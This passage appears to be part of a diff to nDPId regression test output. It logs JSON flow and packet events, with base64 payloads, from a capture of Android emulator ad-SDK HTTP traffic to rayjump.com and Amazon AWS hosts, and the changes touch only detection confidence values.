0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="} -00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2344,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184982,"flow_last_seen":1654385184982,"flow_idle_time":7580000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":262,"midstream":1,"thread_ts_msec":1654385184982,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36660,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv\/endv4.html?mof=1&ec_id=4&mof_uid=91199&n_imp=1&unit_id=8881&sdk_version=mal_8.7.4","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} +00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2344,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184982,"flow_last_seen":1654385184982,"flow_idle_time":7580000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":262,"midstream":1,"thread_ts_msec":1654385184982,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36660,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv\/endv4.html?mof=1&ec_id=4&mof_uid=91199&n_imp=1&unit_id=8881&sdk_version=mal_8.7.4","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 02414{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2407,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":2,"flow_last_seen":1654385185015,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"thread_ts_msec":1654385185015,"pkt":"nLbQ0+MztKXvZygQCABFAAXIXwoAAPgGIaESQGcewKgCfgBQjzQ\/gHc7GAA7E4AYAINkpwAAAQEICgAnDeicUad2RWsIZamOljqm7gSNKAkXQCu+hVDQvHNR9FYzcLa6bcMwfHz8+6Ohpq2yX4VCM8MnePOCbl7QzQu6eUE3L+jmBd28oJsXdPPvCN38HeCm8Yfm\/kvPR3Dz+vd\/+5\/+qz\/+F\/\/73\/yP\/8vf\/ov\/+v\/+3\/7l3\/xn\/\/nP6n\/VjBMyedbYcXZ\/o\/OF7mdeh9Hhr\/RfIfMv43vvKuRdCur\/FFM9E59fEn2SOA2NKnl1bdNivqb2mOXNXHq1\/YMX1\/Ovvr+Ls8avbLeJu\/n+XUe8voOwYRiE416SRHkHbuH3JI7AK5hcYzixRhEYhd8jOEmi6zWCkdiKXBEYCfi+gog\/Et\/23iV5mL96vr5z8qbJ03dVHEbNXOMfCP\/4uyrDZ\/hnarl7h38mQu9N1tzbJ+HHYOnfwgd4YKemZxmEk6Yfkz3lh\/aJu5CbeloHFbHt+TJXIpxmxZgsZHiRMOZFvKzyDdgT70P7AneujlPtVyx1Ci8u7Wd7MtsuMwhfTyvOMfV9uKfpBVoFiWcijlTzRwo97G1lTY77npOvQt2eMaaQrdoht73lsx1+nZwlg+BlIhnXXbgLsHWy5C\/CTrdrpvOys4hB5bmgib5vMJLqdEuhL1RVueIWhr1W24corWULSQqDfGNsr1HdHI4FJV+WwuEwhjFLFwqL5Xy27akNzx1XpbTfbywRws5chR\/VzSRUHZ82JFfLUbM21UlmqXQlB5CS01wcLs0xrplUXKuatlxW\/JnKqnFYcvIJ+HnXlDQp0jzZWW7b+IreDkRwtvod2OSadqez+8PJQr11ODo3W9Sq9lB21UYv1nbZnPkKxY3GO2VJgKi3y86OY2lDWQkA3y1giPPL0I8WU8XJRBa7HXzc3Kr4uITR5JDT0WTaYXbC9v5VWfTptvCOnVLv18ciGZlm2dHCfrfBJ8PAq77hGFHEh2RHh+SoYiYL45XZJMJ1SZZMbDASfdSvphUfow01aDWyqsWVpJirq1bhq16jM844FVx6sRj6QlADNWTuRMUGtyRUymqEmNkJt0Yb1N1graqbbda1j4vrOEyE7tb2An3aY8uYGHAX8\/rsNN6gbsLJaXGuswDrrwixB2A37Y+RJEMuQhm9tVPq3bKPTkuFNlJk4shWDhxGJ4gRxe1aHQH+OdOeb5ZAybp4QOtbdJVZhbI7fRHTpmi3Db68nJpjZBHlst+pE6dd\/auVOTRGjFYfMxlXYZeV5CtjfADQStuORhXR14nj+JExkEESLQhVIgsxAsrbUusYDOsmiIS0OxhmECNGsnePTqNm9Ybk0jiCIUUMk0Q6bo9XikfzcXHRxBU2KhFA7wFnV9mu0s+4T+Cmvs31pVGdu01zTdMqOQbatST8XeSiGb9xLLVobbjVxgASHcVY6Z0cEk1Zw70WhNMSziSBuvEt6nPBEkkYPUs89VCHjedyHoevTwhpwRtTvVC9cjscTpkEl70Q5ZcEM0iBVlOrZshoxaxTCyVqkcFaQaTJND7qiruC9vSgHxhROJty2frJRGcUkW\/T8bzArQu62Aj8pZfq5WnpurUmhYNXBBstPB0HdLEt67HP9CUNcHaVL\/py5Tv+IiqnHSGMtLAtT2aEyysT7VlU2B1c0UynpCL4dONoCBQZiWBCCob59IQIU9r6hD5FW92974pfH398cuCh13wO5v+Bzpq+x4zOk7NmVkyoZTPht8XqNPclVgd+dr30ls5urO+xrXKEf+KEQVxrl2X5Oea+B7dP8f2vfeAhlpy7jKenuJahub4U2SPWInq+hVn3Kp7Xjnw5Mt72ttIa3qJmWSX5OaelWMO1q4cTtae5TXSrzL1EZlCA5nHYN3tCgikSvSDqTjQq48xf4eq4x89aD51T5RZZJ\/zYX3eIruVriHTZcy9vlhIyXU6UT8Gkvj5OMbHU"} 04442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2408,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":3,"flow_last_seen":1654385185015,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2922,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2922,"pkt_l4_len":2888,"thread_ts_msec":1654385185015,"pkt":"nLbQ0+MztKXvZygQCABFAAtcXwsAAPgGHAwSQGcewKgCfgBQjzQ\/gHzPGAA7E4AYAINH0wAAAQEICgAnDeicUad24XFtV7Rg10duU4UTlxkMf+4hbiOeKWSTGwnHrK\/bcVHDmrmHVT1QbFoe9jUro5dI5TdYvpHS0y1rjoh+0U3zcCtX9rblxRoi5FhuCbqzSJTCJ\/SCO4zZZSPYNE6w5HSVgAaV0y2oWClZOTWZhlvMk\/XLRpM2IbCWurCzT+9+nnf\/OWUMYJ35yVcMM8b6\/R\/\/1f\/5x\/\/+v\/rM8TWeCOPgXR\/Wn9HNbJqvANEK619BcRX6k+IzZvpCAIbt5MNPYdScnyfOCY1\/TyD1rf7duf9o+anpe+Lk86r6HoqW4GHx6Znn1+7nR8VPBz8nS9L5cAeE+tP9z7LkZg6+ssfPLHPhW3ltM+PZT5K8\/\/msfZakyRs7mbt7Xv7\/5l\/\/85\/obM72VPyqzrNvqjRrU2d+wff86N\/86\/\/y1dOAvpLFbex7cuAdHr+ancs7IF7TArMobu\/azMv7LMnv2ZI\/Gupcy2kBmgQdfr79Efcrp\/mm7gDzHc7PmZXzYaydhcl9sn\/Bdl7f8evdzu42\/KM6\/2CPyGFz2XrOAlzQ68abCb\/NI1L4Z494f\/7\/wYeXvY12b\/v45AFpVjEKiukvMgW7N34KJ1mHT5uII8wicQAf7cIJq5oahpZLfYWtbiLN8Nh5vTFcczsoLYRSQOpr5+wJefBB0Bcjqs8OVij5zI4Q8US3kT6+pov1ZlWX1ZbBLAo\/CWVvJs7o7OLKwNZicOUC1akI83ha4yIZMssUw8P1miwuy6UgRf4eU5Z4nB6XmLKp3MOmhnDsUnscvDaHlhO5ju5pELGc1S1KGIjCWSnZkCldR8tC3DNDZhx2FKPl6Ci6COlwEwia\/ctaSG\/KNTGIWOI6zxgGatnGGthaTk1Dl52EoUGrXjVsYFdBMq6zs3e4rH0Kz4xNdXR5SSjlJSGkp+XAetsK67orj5IjKZ9wGSH8hV8441VbQeRVqYj9GmcyBGz12el6BMEvIWJjscDyTLrh3gbg\/hA7bG\/IFWoEHieVcL0Fga3fQZtUIvBGrA4DAHWEdWYmHNmovkcclhbSpgp39QFulyfMoKwtehAkztJTKuJ6VmqPjURtjSFB1eFWH1Yc7LQ6dAu7tRLspVXE29p+fTlt3DU5BIU4qVWEQhjVxOQJJno\/tO47JaUb5kHb4cxZFH\/xjOAXlxRYQ3maguAXxIPDq5+U3s2e6xvHBz+qA9znj+qA0r3OzF78\/m\/\/m3\/x5GWK3\/9f\/8f\/9On2j\/\/DZ+rf\/K\/\/8y+4ISevvLvD+vmDL13\/qNtPXbbJM1cS1\/MvdrRzDv0vjv8pQXvOIP9JD\/cE7a+oLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwna3zq1eknQnu9fUpheUpheUpheUpheUpheUpheUpj+Q0th+u1o6CVB+wXdvKCbF3Tzgm5e0M0LunlBN\/8+oJu\/A9z8u0vQrpCfFX85I7tCnPBbGSm\/lk30zbTs9WqNEysUXZM4hpMYDijwEhBJBF+uEHC\/esnKvn9esrJfsrJfsrJfsrJfsrK\/dtYvWdkvWdn\/qKzsr2DFb8iy\/jbI+v87\/boZGvre\/q+mYD9X+y2Z2M+J2D+hfcm9nhP5\/pG515+TmJ\/6\/\/ct9fpHOdZMY39Dhb8G6D\/nW\/8jnNtLgvVLgvV\/PAnWP1o8\/7C\/j\/GrCdn3b9X++rjgVxOy5zr\/lhOyP3X5907ILoBTEbN4znv+kQ+d\/VichUew\/T3fvn\/\/\/udb4HMLzxvoT2hNXDD+vDu9qpsx8R\/BjlUk9vhhnsjPvM9fbh60mXtP2067WZA3b3\/43ScSuJ+\/Jh1o\/589f\/f5q7983TbBO\/IvX383f1X7D26e5NWHfwLD8Hfzt4KHVQ4c8Yd\/EgTBd\/P3kwdgm3k3fgA95Uny3bved25AP7N3flfHk\/\/O9q5t3XxAYPiffvcurb\/95OP9S+H\/7Ie8bRKwU3yAf7mheXxfntrFuygOo2R+sfDuSdIqdOw38MP939t7ww\/zd6D\/EIBt6F1gp3ECpLWz+l3tV3HwcX72AGbrwUsevObB8x7a5CFPHpL4IUIeIvQhWj5E2EOEP0Srh6LyH9zc8x+CvEofgthPPDBjD4kfAgt5iLOibR5mie3Ktx+KByfJ3VvZ5o3\/0EQPjfcQVQ9Pm9mDXTWxm\/gPdh2D5jwf7JBJDVoMXbuY9TLfttXcEahdPcxoZb7Ms188AHtsHzK7e6j9uxJ\/SO0qjDMwbYXtzab0Af74JEztJ4Dls0xPkzBP59O0NzPI+eFpHczTl9hF7X\/4dPPd8wNgk+5To59HDLbN52qAajtO9WADA8jG9DP1u3tXwLZiO5u1VqV28tHzkx\/uGvXAsqruh4EfZoW\/ayIwsDD6CMSv\/Lp++DQLbtw8z7gXZA9+Os8jaPN5HLPhPzf91F3vz4bwAYfhj0CFbfLDvEY\/82X+x0\/tNtGTHDawHCCCHzQfv9L2zybrqx7KD44P7MB\/KD\/YAVDSD89\/3+DDn\/7px7p1Huq2+FETBP5Pv7sPNXpqAegqr+P7DFR+Ys8I8zuwnIBV2MmzWDMImat8nFtq8uLDu\/e4n85t\/\/D0Qg0Q0Jlif4jmpfjV1IKF6lf3FuKsfrC\/en6fktcP8aOXuy0wqua9C4yk8dnEn0tvXt9n7vXb7+LgzWeW0G+en9f0eLRD2U79N3c4\/frtX8B\/9d4uCrAYmChOvDfx24f4\/b0RPfL95u2PC++fMbb313\/95id0t67nt6yPzdvv\/KT2XzXV+EP8\/v4HGua3lI8N0GLjRm\/8t5\/IT+wfP755+\/DZr8UP4Plnxzf7vNnP+Y\/VPAB69mHApJlkPuHSwBJ58\/Z9H3tN9B2Owd\/7UP0nf\/LGfwT3f1a\/\/e7JQfoQAn9XPQn6ftarDtT62CxeF8Prh\/R95aeP8f3\/5uNcASxxUP40aw\/Vo\/258Dx9Dzmgla1fjfp9lebVmz9NgSP4iwzM6OPrLvb7+57zV3\/69iH5VdYg8YcYTOWdtX6EHzzwkz4CMZ8fgCn+Unj84eNdo\/nTlLiP+TwlVNNUMXBOQJfPdvz67fv0PtFQDDaN2E7+8l0NjNN\/fPMXf+n95fu\/WryF3n7ngomatziwc3BgH2veuH+B\/NUsxJ0kAiNCIO\/t2493TYJOk6dOo8fklzqdRYueuIrH6CsRvKL6sQAPwRee1B7itE2\/4vmuAEI+S\/QkZHEX8idyAznrt++bnIsH33uDvn0Lmv55teC3VPv4EQzgd8CAfuc9jaJ9BPYNvHUc2kBx8\/owQWgFrPKT3HbmVXnsQeF9ufwaZ3z\/Qy4z49sHZzYvv4tdXwF9J9q8pL\/zHhEIyNz++fL7RweI\/7v6r\/8a3NZv\/3z5Af1CQu8k9APyAXk7iwvM+ifKuAdqYBZfP9RvH36XvwUsb2Zr\/Zl7mE3w9du3P6s82+Trhy\/2+\/Yh\/xnHJ10\/vH5W67NhvV54i9cPr571+DMiYP2K2Nbz9gQosyN5zHLQV\/U+iKv60xq7u6G336D9xE3lT57mrq3w62ECdADMMvxZlQf7fV+B7elN+MU3gcl8D7YwtgP1JLD1+ID+BqDJeQd4\/cU3vf0BbP12dYxTHyCeN9nbh+wRzNCncvOwhAF0efgdMtvD1+3NgLKO8v5HLQJf578vZmMBTB7Q8m\/o4LkHoI20SPzGf\/34CMYOhu6N+hxf\/7n9fgZHP\/d4CPpn9d3pfbC\/IdvmsJ\/fwcw0gGp97yej\/jsafJIHuGLgTuclHN\/\/r+\/ONQCTGGmz"} -00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2408,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385184982,"flow_last_seen":1654385185015,"flow_idle_time":7580000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":1515,"midstream":1,"thread_ts_msec":1654385185015,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36660,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv\/endv4.html?mof=1&ec_id=4&mof_uid=91199&n_imp=1&unit_id=8881&sdk_version=mal_8.7.4","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} -01176{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2427,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1654385184944,"flow_last_seen":1654385185026,"flow_idle_time":7580000,"flow_min_l4_payload_len":497,"flow_max_l4_payload_len":5712,"flow_tot_l4_payload_len":109025,"flow_avg_l4_payload_len":3407,"midstream":1,"thread_ts_msec":1654385185026,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36640,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2022\/0428\/endcard-dsp-1302-f2714a34f6661a70fedea1667fb7a9e4.zip?md5filename=f2714a34f6661a70fedea1667fb7a9e4&foldername=endcard-dsp-1302&mof=1&mof_uid=91199&n_imp=1&mof_pkg=com.sceneway.kankan&n_region=fk&alecfc=1&bait_click=1&mof_textmod=1&bp_test=2&wglbp=1&cta_type=1&mof_use_get=1&dlst=0&mof_use_get=1&plmug=1","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} +00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2408,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385184982,"flow_last_seen":1654385185015,"flow_idle_time":7580000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":1515,"midstream":1,"thread_ts_msec":1654385185015,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36660,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv\/endv4.html?mof=1&ec_id=4&mof_uid=91199&n_imp=1&unit_id=8881&sdk_version=mal_8.7.4","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2503,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":2,"flow_last_seen":1654385185166,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1654385185166,"pkt":"nLbQ0+MztKXvZygQCABFAADe9z5AACoGBubKmcQ1wKgCfgBQ5Ybmg6trug1byIAYAPOTtwAAAQEICkyTXI+9cmjoSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IEFwYWNoZS1Db3lvdGUvMS4xDQpWcGFkbi1TdGF0dXMtQ29kZTogLTI2DQpWcGFkbi1TdGF0dXM6IE5PX0ZJTEwNClZwYWRuLVN0YXR1cy1EZXNjOiANCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBTYXQsIDA0IEp1biAyMDIyIDIzOjI2OjI0IEdNVA0KDQo="} 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2504,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":2,"flow_last_seen":1654385185942,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1654385185942,"pkt":"nLbQ0+MztKXvZygQCABFAADeE\/tAACoG6inKmcQ1wKgCfgBQ5Yg8Z0+pmkmYKYAYAPN5zQAAAQEICkyTX6y9cmj1SFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IEFwYWNoZS1Db3lvdGUvMS4xDQpWcGFkbi1TdGF0dXMtQ29kZTogLTI2DQpWcGFkbi1TdGF0dXM6IE5PX0ZJTEwNClZwYWRuLVN0YXR1cy1EZXNjOiANCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBTYXQsIDA0IEp1biAyMDIyIDIzOjI2OjI0IEdNVA0KDQo="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2505,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229374,"flow_last_seen":1654385229374,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1654385229374,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"52.29.177.177","src_port":37100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2505,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1654385229374,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385229374,"pkt":"tKXvZygQnLbQ0+MzCABFAAXUbkhAAEAGHefAqAJ+NB2xsZDsAFBe8J4SSC8RAoAQAfauuwAAAQEICgB7lmPzZF3LR0VUIC90cmFjaz9yaWQ9Zjg0ZjU0YmYtMzFjZC00M2ZmLWJkMjctNTI2Y2NjNjQ1N2RhJmltcGlkPTEmY2lkPTY1LTE0Mzg0NSZjcmlkPTY1LTI1MzY0MCZzcGlkPTg4ODEmcHJpPTMyOS42OSZjaD0xMDAwMSZjaHJpZD02MjliZWEyMGE0ZTU0MTAwMDFmMDFjN3gmY2hwcml0PTAmY2hzcGlkPTg4ODEmY2hwbGlkPTM5NjUmZHNwPTY1JmV4cD0xMDgwMCZiaWQ9Zjg0ZjU0YmYtMzFjZC00M2ZmLWJkMjctNTI2Y2NjNjQ1N2RhJTNBaGFnZ2xlci1taW50ZWdyYWwwMjEudXMtZS5lYzIubGlmdG9mZi5pbyZkcHJpbj0zMjkuNjkmZGNpZD0xNDM4NDUmZGNyaWQ9MjUzNjQwJmFkbT1hemFybGl2ZS5jb20mYmRsPWNvbS5hemFybGl2ZS5hbmRyb2lkJmFkdD0xMiZ3PTQ4MCZoPTMyMCZ0cGlkPTEmYXBwaWQ9MzI0NTYmYXBwdj0yLjguMi4xJnBsZj0xJmR0PTQmZGI9Z29vZ2xlJmRtPXNka19ncGhvbmVfeDg2Jm53PTImb3M9YW5kcm9pZCZvc3Y9MTEmYWlkPTVhYzZhMGZmLThkMTgtNDdiYy1hOTAyLTI4MTJjZjBjMjUxZSZhaWRtPTdhOWNkYjk3NWIzZTA4ZDJiMGM0MjhjZDQ2MmRhM2ZkJmFpZHM9MzZjMDgwZjFiOWFhNTYzODAxYzk2N2M3MGQyMDIwY2E4ZWU2YjZiYiZ1YT1Nb3ppbGxhJTJGNS4wKyUyOExpbnV4JTNCK0FuZHJvaWQrMTElM0Irc2RrX2dwaG9uZV94ODYrQnVpbGQlMkZSU1IxLjIwMTAxMy4wMDElM0Ird3YlMjkrQXBwbGVXZWJLaXQlMkY1MzcuMzYrJTI4S0hUTUwlMkMrbGlrZStHZWNrbyUyOStWZXJzaW9uJTJGNC4wK0Nocm9tZSUyRjgzLjAuNDEwMy4xMDYrTW9iaWxlK1NhZmFyaSUyRjUzNy4zNiZpcD05Mi4yMTkuNDAuMjM1JmV4dD1RYjZOU0NKZkpTNHElMkJZRGZNcmxEVkxqZ2pvbTVKUEZDJTJGV0hPY1VhV1F2dUI3MUoxZks0TEhNU3d3WDlldjN4Q2lxSUFJODUwUXpseXFmbXhqNTMxalJ0eUljRkwzaVdmeEZCbFNYUmdBc05uR3N3enVucFl1d2tzREVlOUFmSFVObDJxazk1QXd0JTJCeWplbiUyQmRUZEo2UEolMkZ4WjFUalBlb3BxNEdiNWdxNG1weDhSOEYwdEtZJTJGdGRja283ckF2eGJFVFRPZUpYTiUyRiUyQnRoM3N6eEVsREhHMG1zU3QlMkJOcU1OUHNDZ0lsaVB6NkgxbWltQXh6czlXemRSNU5ZUjM3RWQ2SjZjTUxSQzFGd3ZsdHlLVjFZdmlMZGJyRlBTR2lTMjhodmpCM21pJTJCdDlCcmYlMkI5JTJCa2ZSJTJGMEpTVUtTUlFKTE9DOTJwJTJGUzJLRWw0MEJRcjhiUmUxQXhjQ0R1bHFHYXpHZXI5ZEFxZzNjc1ZQNWg5VDlzaXZRVGZhU1g4TTBKQmpab2dyMW1VQkFWODBqRXBRbEg1UEVhMDRsYU93OXNrRnVQYXdZcmFCSnA4cDRpN3Fub1J2blc2dWxlTmtEM2tYalFPSmhuZmhBV1ZuOSUyRkMlMkY4bGxZMUF2VU1xaFA3b2ZzVjQxME51SHglMkY5MkE5d3glMkZENUxXVnhCeU5HdTRMeE1QaFlOYVV5TTAxa2FQWG5rRjloRWtoNFBraVVXT1ZJWTYxcGdiNGpmZ0gmdHM9MTY1NDM4NTE4NCZzZGt2cj1tYWxfOC43LjQm"} -00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2505,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229374,"flow_last_seen":1654385229374,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1654385229374,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"52.29.177.177","src_port":37100,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} +00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2505,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229374,"flow_last_seen":1654385229374,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1654385229374,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"52.29.177.177","src_port":37100,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2506,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":2,"flow_last_seen":1654385229374,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1654385229374,"pkt":"tKXvZygQnLbQ0+MzCABFAABIbklAAEAGI3LAqAJ+NB2xsZDsAFBe8KOySC8RAoAYAfapLwAAAQEICgB7lmPzZF3LaGliaWQ9MCZvZm49MjUzNjQwJnI="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229375,"flow_last_seen":1654385229375,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1654385229375,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1654385229375,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1326,"pkt_l4_len":1292,"thread_ts_msec":1654385229375,"pkt":"tKXvZygQnLbQ0+MzCABFAAUg7FZAAEAGNrLAqAJ+I5wsDaY6AFDzNa5LO3\/w14AYAfYX4gAAAQEIChlnEfkPV8RGR0VUIC9vbmx5SW1wcmVzc2lvbj9rPTYyOWJlYTIwYTRlNTQxMDAwMWYwMWM3eCZtcD1mVVJQRHI1dGlVU3RmN1YyZmFqTWlhdmVIVXZlREFKOTZhaVBmVTVJaUFSVGZuSElHYWw5aSUyQk1lZmJNTTZqeGM2YVJBR2F4SWklMkJNUGZkTWVpJTJCZXdEa2U2R285YldVeElpMDk5V1VSJTJGaSUyQmVnWUZLZ1k3NUloRng4JTJCRkpNTDdLJTJGSDVLOUdhSElpbmhQZmRsZWlhbE02YXpJSGtQSUclMkJlSUduUiUyRmlValBXVU5NV1VSQWYlMkJlSWlCOWVpVWolMkZpVVJUV1VoQTZkZUlEVVFRaVVsYmZBREFmbngzaVVWUEglMkJNMkRraUZEblNySDBUOUhhajlXbk5iRHJpd0RuM01pMFRCR2FqQkRGRE1EQVIyaWs1STZhak1pZ01CaWRNZTZhU0lpbmgxR1VjSTY3S01Ia1B0aDdRSTY3Y2JoRkg4TEF0QTZhU0k0QnpVTG9SMWludk1pYWpzUnJ4QWg3UTNSVUVGZlpNMERGUTNSVUUwaW5OQUdhTjJSME0wRGt4d1JVdVlScmMxRCUyQnpzTCUyQkhRV3JmWFlaekpXb3owSG9SMVJyZlhZWlB0NHJjQlk3UUZIWlB0WXJ4QllGUTNSME0waGR6dURGNTZMazkwR1VpQkdaOUZHblJBV296TWhyUVVINUtYSiUyQk4wR1VpQkdaOUZHblJBV296dWgyS0VEMFIxaW